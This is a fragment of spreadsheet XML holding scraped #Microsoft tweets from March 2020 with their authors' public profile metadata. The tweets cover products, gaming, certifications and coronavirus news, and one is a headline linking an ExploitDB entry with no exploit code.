    <t>Wanting to get organized but still aren't sure how to? Try #Microsoft Nimble. https://t.co/owJ91vDhFx #tech</t>
  </si>
  <si>
    <t>Wed Mar 04 19:40:20 +0000 2020</t>
  </si>
  <si>
    <t>% True
At a veteran #Microsoft employees place, here in #Seattle. This is his, *brand new*, high-tech remote. 
I hit the Netflix button... and Netflix popped up! Comprehension  of the universe lost. Its like #2050 here. No s. Runs on nostalgia.
#gamers #XboxSeriesX https://t.co/W8MPnvSfEm</t>
  </si>
  <si>
    <t>{'id': 1017517491000467456, 'id_str': '1017517491000467456', 'name': 'Trick ðŸŒˆðŸ•¹', 'screen_name': 'JCTrick', 'location': 'Seattle, WA (White Center)', 'description': 'Opinionated AF hardcore Seattle gamer. PC, all ðŸŽ® consoles and cutting edge VR/AR. I DO NOT Twitch, blog, YouTube, play eSports, stream or work in gaming. ðŸ˜', 'url': 'https://t.co/KVKo2PAM1K', 'entities': {'url': {'urls': [{'url': 'https://t.co/KVKo2PAM1K', 'expanded_url': 'https://howlongtobeat.com/user.php?n=JCTrick&amp;s=games&amp;completed=1', 'display_url': 'howlongtobeat.com/user.php?n=JCTâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 86, 'friends_count': 43, 'listed_count': 14, 'created_at': 'Thu Jul 12 21:14:09 +0000 2018', 'favourites_count': 2379, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4478,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'http://pbs.twimg.com/profile_images/1161736633495875584/yxnGP5ts_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1161736633495875584/yxnGP5ts_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1017517491000467456/1568158575',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</si>
  <si>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19:40:12 +0000 2020</t>
  </si>
  <si>
    <t>New #cloud technologies call for a new team of heroes, so we helped develop epic characters across several channels to educate the IT and Dev community about #Microsoft Windows Server 2016. Check out our work here: https://t.co/ICijUGH0zM https://t.co/Fwn2qUEVP6</t>
  </si>
  <si>
    <t>{'id': 2575461312, 'id_str': '2575461312', 'name': 'Indigo Slate', 'screen_name': 'IndigoSlate', 'location': 'Bellevue, WA', 'description': "We are an #ExperienceAgency with a passion for technology. Let's make something great together.", 'url': 'https://t.co/vUJ56z4NsZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/vUJ56z4NsZ', 'expanded_url': 'http://indigoslate.com/', 'display_url': 'indigoslate.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 758, 'friends_count': 925, 'listed_count': 87, 'created_at': 'Wed Jun 18 20:50:26 +0000 2014', 'favourites_count': 981, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 785,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'http://pbs.twimg.com/profile_images/1039976052683100160/LaI0Ze3h_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1039976052683100160/LaI0Ze3h_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2575461312/1536786215',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</si>
  <si>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19:38:05 +0000 2020</t>
  </si>
  <si>
    <t>Day 62/366. 2003/10/14.
#VideoGameCollection #Games #Gaming #Microsoft #Xbox #MTV #CelebrityDeathMatch #GothamGames @ Greensboro, North Carolina https://t.co/5ez9SjPhyw</t>
  </si>
  <si>
    <t>Wed Mar 04 19:37:15 +0000 2020</t>
  </si>
  <si>
    <t>Promote your reports, dashboards, and apps on Power BI Home
https://t.co/mckqYMHtfx 
#microsoft #powerbi #reports #it #apps # https://t.co/fPyzITfk4O</t>
  </si>
  <si>
    <t>Wed Mar 04 19:35:05 +0000 2020</t>
  </si>
  <si>
    <t>Day 61/366. 2003/7/1.
#VideoGameCollection #Games #Gaming #Microsoft/Xbox #PiratesOfTheCaribbean #Disney #BethesdaSoftWorks #Bethesda @ Greensboro, North Carolina https://t.co/EP78uIciMl</t>
  </si>
  <si>
    <t>Wed Mar 04 19:34:50 +0000 2020</t>
  </si>
  <si>
    <t>Another @Microsoft @Office Industry Certified student for 
@TheSCHSChargers  Please help me congratulate Samuel M., for passing his 3rd certification, @Outlook I'm proud of you, Sam! @Jeff_Eakins @AddisonGDavis @hcpsarea5 @raburn4 @HCPSCTAE @CrestYbk #Microsoft Not a fan of pics! https://t.co/a92DlFyWYw</t>
  </si>
  <si>
    <t>{'id': 351369659, 'id_str': '351369659', 'name': 'Coach Kelly CSCS', 'screen_name': 'CoachJohnKelly', 'location': 'Tampa, FL', 'description': '#Coach #NSCA #CSCS ; #Teacher  #FCA FAITH, FAMILY, FOOTBALL ; Former U.S. #Army &amp; #USF Alum ; 4 Teaching certs, 3 Microsoft certs, 2 CIW certs.', 'url': 'https://t.co/deOv80kSra', 'entities': {'url': {'urls': [{'url': 'https://t.co/deOv80kSra', 'expanded_url': 'http://hhsterriers.com', 'display_url': 'hhsterriers.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1407, 'friends_count': 1517, 'listed_count': 20, 'created_at': 'Tue Aug 09 04:37:15 +0000 2011', 'favourites_count': 11943, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6892,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'http://pbs.twimg.com/profile_images/891484580162805764/ZVVELOvu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/891484580162805764/ZVVELOvu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/351369659/1532829074',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</si>
  <si>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19:34:11 +0000 2020</t>
  </si>
  <si>
    <t>Did We Just Attend the Last Trade Show Ever at RSA? https://t.co/A18JHYuhgG #at&amp;amp;amp;t #breakingnews #facebook #google #ibm #mcafee #microsoft #op-ed #opencomputeproject(ocp) #opensource #security #topnews #verizon</t>
  </si>
  <si>
    <t>Wed Mar 04 19:33:00 +0000 2020</t>
  </si>
  <si>
    <t>Here's something you don't see regularly on the window display! This is actually a simulator to attract people to the @microsoftuk store and try the forzamotorsportofficial on the @xbox .... Brilliant 
#microsoft... https://t.co/7DtMQNMZYG</t>
  </si>
  <si>
    <t>{'id': 41901182, 'id_str': '41901182', 'name': 'Ebrahim Alawadi', 'screen_name': 'awadi85', 'location': 'Kuwait', 'description': 'A Kuwaiti marketeer, a photographer and a motorhead', 'url': 'https://t.co/CYdNxUyskh', 'entities': {'url': {'urls': [{'url': 'https://t.co/CYdNxUyskh', 'expanded_url': 'http://eaphotology.com', 'display_url': 'eaphotology.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 283, 'friends_count': 166, 'listed_count': 5, 'created_at': 'Fri May 22 21:06:45 +0000 2009', 'favourites_count': 20, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4110,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'http://pbs.twimg.com/profile_images/768775368400658432/W83xd9B4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/768775368400658432/W83xd9B4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/41901182/1350495892',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</si>
  <si>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Wed Mar 04 19:32:28 +0000 2020</t>
  </si>
  <si>
    <t>Day 60/366. 2002/11/12.
#VideoGameCollection #Games #Gaming #Microsoft #Xbox #SeriousSam #Crowteam #GothamGames @ Greensboro, North Carolina https://t.co/ulyHPuCQYe</t>
  </si>
  <si>
    <t>Wed Mar 04 19:32:07 +0000 2020</t>
  </si>
  <si>
    <t>Reach your goals #emprendimiento #bogota #itconsultant #arquitetura #innovacion #innovation #technology #microsoft #tecnologia #colombia #architecture #archdailycolombia https://t.co/pnxYuHnHLe</t>
  </si>
  <si>
    <t>{'id': 3030256738, 'id_str': '3030256738', 'name': 'BiGan CloudServices', 'screen_name': 'BiGanCloud', 'location': 'Colombia', 'description': 'BiGan CloudServices enfocado en la satisfacciÃ³n del cliente genera sistemas y soluciones de alto impacto usando la tecnologÃ­a como aliado estratÃ©gico.', 'url': 'http://t.co/Vcblx3YIhY', 'entities': {'url': {'urls': [{'url': 'http://t.co/Vcblx3YIhY', 'expanded_url': 'http://www.bigancloud.co', 'display_url': 'bigancloud.co', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 64, 'friends_count': 177, 'listed_count': 24, 'created_at': 'Wed Feb 11 12:39:15 +0000 2015', 'favourites_count': 7, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 635,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'http://pbs.twimg.com/profile_images/1230633869499609088/mIldhA7w_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230633869499609088/mIldhA7w_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3030256738/1581625976',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</si>
  <si>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19:31:51 +0000 2020</t>
  </si>
  <si>
    <t>A very exciting day for Technology Vice President, Emily Carlson as she visited #microsoft to discuss Teams and its capabilities to support collaboration in healthcare! https://t.co/6NoUTDNR7H</t>
  </si>
  <si>
    <t>{'id': 148756343, 'id_str': '148756343', 'name': 'DIVURGENT', 'screen_name': 'DIVURGENT', 'location': 'Virginia Beach, VA', 'description': 'Redefining #HIT #Consulting thru Implementation, Activation, #Cybersecurity,  Transformational, and Financial and Strategic Advisory Services.', 'url': 'http://t.co/cA0hSXJMuo', 'entities': {'url': {'urls': [{'url': 'http://t.co/cA0hSXJMuo', 'expanded_url': 'http://www.divurgent.com', 'display_url': 'divurgent.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 764, 'friends_count': 641, 'listed_count': 52, 'created_at': 'Thu May 27 14:32:41 +0000 2010', 'favourites_count': 314, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1534,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'http://pbs.twimg.com/profile_images/1051814748944093184/VMY7j2DQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1051814748944093184/VMY7j2DQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/148756343/1474640029', 'profile_link_color': 'D12C2C', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'E01919', 'profile_text_color': '000000', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 19:31:02 +0000 2020</t>
  </si>
  <si>
    <t>Trying to balance work, school work for the kid, house work, and everything else is hard. A new nanny everyday (via back up care) adds to the uncertainty. I feel fortunate that I work for #Microsoft as they make life better by supporting working moms. #MicrosoftLife #CareerMom</t>
  </si>
  <si>
    <t>{'id': 36285450, 'id_str': '36285450', 'name': 'Manjula Iyer', 'screen_name': 'manjulaiyer', 'location': 'WA, USA', 'description': 'Principal Group Program Manager for Developer Services at Microsoft, mom, believer and advocate of science. Views are mine.', 'url': 'https://t.co/A7YgXivK9P', 'entities': {'url': {'urls': [{'url': 'https://t.co/A7YgXivK9P', 'expanded_url': 'http://www.manjulaiyer.com/', 'display_url': 'manjulaiyer.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 73, 'friends_count': 123, 'listed_count': 2, 'created_at': 'Wed Apr 29 04:21:02 +0000 2009', 'favourites_count': 25, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 169, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '000000', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme3/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme3/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1226226053225406464/65DNktcS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1226226053225406464/65DNktcS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/36285450/1561502676', 'profile_link_color': '0000A0',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</si>
  <si>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19:30:35 +0000 2020</t>
  </si>
  <si>
    <t>SQL Server Memory Pressure #Troubleshooting
https://t.co/XfRRWAgQK3
#tsql #sqldba #SQLServer #performance #microsoft #madeiradata https://t.co/gcvU90Zzin</t>
  </si>
  <si>
    <t>Wed Mar 04 19:30:12 +0000 2020</t>
  </si>
  <si>
    <t>[remote] #Microsoft Exchange 2019 15.2.221.12 - Authenticated #Remote Code Execution https://t.co/LXX3c34t0q #ExploitDB</t>
  </si>
  <si>
    <t>Wed Mar 04 19:30:00 +0000 2020</t>
  </si>
  <si>
    <t>#Tech | #Microsoft teases new Windows 10 Start menu that de-emphasizes Live Tiles. https://t.co/gzIwLUiwWb https://t.co/aWjnVMnUhH</t>
  </si>
  <si>
    <t>{'id': 3179952257, 'id_str': '3179952257', 'name': 'Arturo MacÃ­as FernÃ¡ndez', 'screen_name': 'arturomfr', 'location': '', 'description': 'Conectando el talento de las personas con el software | CTO en @changedyslexia, Fundador de @QualityDevs y Mentor en @swmadrid', 'url': 'http://t.co/0DfTRXWUgP', 'entities': {'url': {'urls': [{'url': 'http://t.co/0DfTRXWUgP', 'expanded_url': 'http://www.qualitydevs.com', 'display_url': 'qualitydevs.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 203, 'friends_count': 131, 'listed_count': 4, 'created_at': 'Sat Apr 18 16:43:16 +0000 2015', 'favourites_count': 1093, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2031,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'http://pbs.twimg.com/profile_images/1060091408554647552/_K1sMUv7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1060091408554647552/_K1sMUv7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3179952257/1570553617', 'profile_link_color': '96C11F',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</si>
  <si>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19:28:11 +0000 2020</t>
  </si>
  <si>
    <t>Ranked to Beta 
#Microsoft #MicrosoftTeams https://t.co/k2akYGg5o8</t>
  </si>
  <si>
    <t>{'id': 2455184019, 'id_str': '2455184019', 'name': 'Fahad Ashiq ðŸ‡µðŸ‡°', 'screen_name': 'iamfahadashiq', 'location': 'Punjab, Pakistan', 'description': 'Web Developer | Blogger | Freelancer | Student of Computer Science | Microsoft Student Partner @microsoft', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 309, 'friends_count': 523, 'listed_count': 6, 'created_at': 'Wed Apr 02 14:56:41 +0000 2014', 'favourites_count': 9114, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6228,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'http://pbs.twimg.com/profile_images/1170815758777094144/uU7fNYFA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1170815758777094144/uU7fNYFA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2455184019/1574792756',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</si>
  <si>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19:27:11 +0000 2020</t>
  </si>
  <si>
    <t>Tweak it (Customizing the UI) https://t.co/xMbIcdzaRx #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 19:25:24 +0000 2020</t>
  </si>
  <si>
    <t>Tweak it (Customizing the UI) https://t.co/LjOSodPs6U #Azure #Channel9 #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 19:22:49 +0000 2020</t>
  </si>
  <si>
    <t>This #free online course caters to those people who want to learn #PowerBI, but have the slightest clue where to get started, register now before it starts on March 16th!! 
https://t.co/1i0iVWUhMO
#Like #Share #Microsoft #Excel #BusinessIntelligence</t>
  </si>
  <si>
    <t>{'id': 864261905392824320, 'id_str': '864261905392824320', 'name': 'DeNisha M.', 'screen_name': 'thepowerbiqueen', 'location': 'Texas, USA', 'description': 'Power BI Administrator, Consultant, Developer, Queen ðŸ‘‘', 'url': 'https://t.co/rGtcGMxyvM', 'entities': {'url': {'urls': [{'url': 'https://t.co/rGtcGMxyvM', 'expanded_url': 'http://www.DeNishaM.com', 'display_url': 'DeNishaM.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 599, 'friends_count': 149, 'listed_count': 7, 'created_at': 'Mon May 15 23:31:10 +0000 2017', 'favourites_count': 240, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 291,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'http://pbs.twimg.com/profile_images/1220600137384452096/ICNEBxXO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1220600137384452096/ICNEBxXO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/864261905392824320/1554135897',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</si>
  <si>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19:22:30 +0000 2020</t>
  </si>
  <si>
    <t>Amazon and Microsofts cloud-computing businesses poised to weather a recession, despite coronavirus, analysts say
https://t.co/bA9vKYIhVO 
#amazon #microsoft #azure #cloud #computing #cloudcomputing #corona #it #issquared https://t.co/073ifBPW5V</t>
  </si>
  <si>
    <t>Wed Mar 04 19:21:05 +0000 2020</t>
  </si>
  <si>
    <t>funny. video. please. watch. and. subscribe. 
@SeaOfThieves 
#SeaOfThieves #sot #rare #Pirates #XboxGamePass #xbox #Microsoft #funny #retweet #share #like #subscribe #gamers #YouTuber #streamer #youtube #youtubegaming #follow #twitch #twitchstreamer 
https://t.co/pslfLGTcGQ</t>
  </si>
  <si>
    <t>{'id': 1002620148388454401, 'id_str': '1002620148388454401', 'name': 'Crimson baad bob', 'screen_name': 'baadb0b', 'location': 'Mass a choo sets', 'description': 'cc for @crimsoneternal \nbaadbob14@gmail.com \nhttps://t.co/yTI1ILRW1z\nI tweet about gaming/anime/pro wrestling/sports, pretty much anything pop culture\nclick thisðŸ‘‡ðŸ»', 'url': 'https://t.co/b0V1vIVKEh', 'entities': {'url': {'urls': [{'url': 'https://t.co/b0V1vIVKEh', 'expanded_url': 'https://www.youtube.com/channel/UCYjnKFVFbP6TdM7on3Iaqbg', 'display_url': 'youtube.com/channel/UCYjnKâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/yTI1ILRW1z', 'expanded_url': 'http://twitch.tv/baadbob', 'display_url': 'twitch.tv/baadbob', 'indices': [45, 68]}]}}, 'protected': False, 'followers_count': 1161, 'friends_count': 1710, 'listed_count': 4, 'created_at': 'Fri Jun 01 18:37:25 +0000 2018', 'favourites_count': 6421, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2627,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'http://pbs.twimg.com/profile_images/1199496822307393536/91dWbMiP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1199496822307393536/91dWbMiP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1002620148388454401/1574819763',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</si>
  <si>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19:21:02 +0000 2020</t>
  </si>
  <si>
    <t>Dragon Ball Z for Free 
It's Over 9000! should be on Episode 21
#dragonball #dragonballz $msft #microsoft
https://t.co/uonhQnwRJT https://t.co/QBGTRORIN0</t>
  </si>
  <si>
    <t>{'id': 373935651, 'id_str': '373935651', 'name': 'Spoofee Deals', 'screen_name': 'SpoofeeDeals', 'location': '', 'description': 'Best Prices, Freebies and Coupons! http://t.co/d8W0lQzwOu', 'url': 'http://t.co/xDG0HrGwcy', 'entities': {'url': {'urls': [{'url': 'http://t.co/xDG0HrGwcy', 'expanded_url': 'http://www.spoofee.com', 'display_url': 'spoofee.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'http://t.co/d8W0lQzwOu', 'expanded_url': 'http://Spoofee.com', 'display_url': 'Spoofee.com', 'indices': [35, 57]}]}}, 'protected': False, 'followers_count': 12843, 'friends_count': 109, 'listed_count': 18, 'created_at': 'Thu Sep 15 12:36:20 +0000 2011', 'favourites_count': 300, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2858, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '012233', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/378800000285129943/893cc4a4a9d5d93e0e084d5e8f605ed4_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000285129943/893cc4a4a9d5d93e0e084d5e8f605ed4_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/373935651/1364007950',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</si>
  <si>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19:15:22 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft to retire #MCSA, MCSD, MCSE Certifications in what's being dubbed https://t.co/7QmN9WPHfd   https://t.co/rEYYaZl2gX</t>
  </si>
  <si>
    <t>{'id': 574388526, 'id_str': '574388526', 'name': 'â˜ á¸ˆá½ ~Ô‚Å¢á¼•Ä‰Ñ’â˜ ', 'screen_name': 'CW_DTech', 'location': 'Toronto, Ontario', 'description': '#ScriptionðŸ–Œï¸\xa0#WApps âŒ¨ï¸ #Artifiligence ðŸ¤– #Ident ðŸ’»', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 752, 'friends_count': 0, 'listed_count': 53, 'created_at': 'Tue May 08 08:27:49 +0000 2012', 'favourites_count': 3796, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2135,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'http://pbs.twimg.com/profile_images/907050996341374976/Rm-aibSl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/907050996341374976/Rm-aibSl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/574388526/1505093471', 'profile_link_color': '94797C',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</si>
  <si>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Wed Mar 04 19:15:02 +0000 2020</t>
  </si>
  <si>
    <t>PatientJourney360 enables increased patient engagement by securely maintaining patient data with Microsoft HIPAA compliant cloud, having complete patient management modules with relevant case types, and more!
Learn more here: https://t.co/z8TM8AjHkP 
#pharma #iot #microsoft https://t.co/iCKhixjmJZ</t>
  </si>
  <si>
    <t>{'id': 3024361036, 'id_str': '3024361036', 'name': 'P360', 'screen_name': 'P360_Solutions', 'location': 'New Jersey, USA', 'description': 'â€œPOWERED POSSIBILITIESâ€ is our promise to our stakeholders, peers, customers, partners, and investors.', 'url': 'https://t.co/3JNiCJu2qQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/3JNiCJu2qQ', 'expanded_url': 'https://www.p360.com/', 'display_url': 'p360.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1073, 'friends_count': 911, 'listed_count': 12, 'created_at': 'Sun Feb 08 02:23:24 +0000 2015', 'favourites_count': 109, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1558,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'http://pbs.twimg.com/profile_images/1213523286950400001/i8AbUzmn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1213523286950400001/i8AbUzmn_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3024361036/1578161473',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</si>
  <si>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19:13:15 +0000 2020</t>
  </si>
  <si>
    <t>#cybersecurity #infosec #microsoft     VIA @office365    Depend on Office 365 for Online Protection  https://t.co/i8IEKxTzw4</t>
  </si>
  <si>
    <t>Wed Mar 04 19:10:36 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft has a new solution that is designed to stop data leaks and insider attacks. #Future #M365 #Microsoft #AI #IT #Tech #Innovation https://t.co/QJ4ajpb0lz</t>
  </si>
  <si>
    <t>{'id': 54165249, 'id_str': '54165249', 'name': 'ACTS', 'screen_name': 'ACTSolution', 'location': 'Jacksonville, Florida', 'description': 'https://t.co/pKa7QKxMpA, a Solution Provider &amp; Integrator, delivering technology for competitive advantage and market share growth - grounded in business outcomes.', 'url': 'http://t.co/Zk0vQpZDyv', 'entities': {'url': {'urls': [{'url': 'http://t.co/Zk0vQpZDyv', 'expanded_url': 'http://www.ActSolution.net', 'display_url': 'ActSolution.net', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/pKa7QKxMpA', 'expanded_url': 'http://ACTSolution.net', 'display_url': 'ACTSolution.net', 'indices': [0, 23]}]}}, 'protected': False, 'followers_count': 2076, 'friends_count': 1932, 'listed_count': 15, 'created_at': 'Mon Jul 06 09:42:24 +0000 2009', 'favourites_count': 8, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8915, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '215B87', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1143911262516064256/hcVgk_1R_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1143911262516064256/hcVgk_1R_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/54165249/1561565673', 'profile_link_color': '1F98C7', 'profile_sidebar_border_color': 'C6E2EE', 'profile_sidebar_fill_color': 'DAECF4', 'profile_text_color': '663B12', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 19:09:56 +0000 2020</t>
  </si>
  <si>
    <t>What can your inbox do for you? With the interconnected power of #Microsoft #Dynamics365, the information you need is only a click away. Saving you time and creating a better experience for your customers. https://t.co/PzcZ9hHZC9</t>
  </si>
  <si>
    <t>{'id': 1112965940, 'id_str': '1112965940', 'name': 'Aasim Shabazz iaskcagile, cloud', 'screen_name': 'AskcSupply', 'location': 'Saint Paul ', 'description': 'Technology Solution Made Easy #askcsupply #cloud #mobility #devops #agile #scrum #innovation | Developing #smallbusiness &amp; #startup communities', 'url': 'https://t.co/Yzq2bJqlIl', 'entities': {'url': {'urls': [{'url': 'https://t.co/Yzq2bJqlIl', 'expanded_url': 'http://www.askcsupply.com', 'display_url': 'askcsupply.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 161, 'friends_count': 212, 'listed_count': 87, 'created_at': 'Wed Jan 23 00:04:00 +0000 2013', 'favourites_count': 100, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 22932,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'http://pbs.twimg.com/profile_images/378800000708957756/7199beb8850ee4e66d7faf740af1c807_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000708957756/7199beb8850ee4e66d7faf740af1c807_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1112965940/1457030391',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</si>
  <si>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19:09:51 +0000 2020</t>
  </si>
  <si>
    <t>When #Windows #7 refuses to #Install you have to get #Creative
@livinstyle
#VM #Clone #Stubborn #Microsoft #Repair #Clean #YouBreakWeFix #CustomBuild #Upgrade #HappyCustomer #ComputerRepairToday #Dell #Desktop... https://t.co/8AandUC6Yf</t>
  </si>
  <si>
    <t>{'id': 36142819, 'id_str': '36142819', 'name': 'Freelance Computing', 'screen_name': 'FLComputing', 'location': 'United States', 'description': "If it's broken, let me fix it!", 'url': 'https://t.co/w5sMo16rpN', 'entities': {'url': {'urls': [{'url': 'https://t.co/w5sMo16rpN', 'expanded_url': 'http://www.freelancecomputing.com', 'display_url': 'freelancecomputing.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 103, 'friends_count': 914, 'listed_count': 2, 'created_at': 'Tue Apr 28 18:37:22 +0000 2009', 'favourites_count': 5, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1167,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'http://pbs.twimg.com/profile_images/860758046833754113/WylmwlEQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/860758046833754113/WylmwlEQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/36142819/1494055806',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</si>
  <si>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19:09:30 +0000 2020</t>
  </si>
  <si>
    <t>Former Microsoft Software Engineer Convicted of Fraud https://t.co/T7M6oE8ctx
#cybersecurity #cybersec #infosec #cybersecurityawareness #microsoft #cybersecuritynews #dontriskitsecureit</t>
  </si>
  <si>
    <t>Wed Mar 04 19:09:12 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Microsoft, Google Offer Free Remote Work Tools Due to Coronavirus:" https://t.co/OdvcAI6N0R
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Wed Mar 04 19:08:59 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoft365 @MicrosoftEDU @Office365 @Outlook @Azure @Windows @BritChamItaly @RegioneLazio @Regione_Sicilia #Microsoft - All #schools in #Italy are closed tomorrow as a result of #CoronaVirusitaly.. How can you support the learning and keep Italy moving? #smartworking</t>
  </si>
  <si>
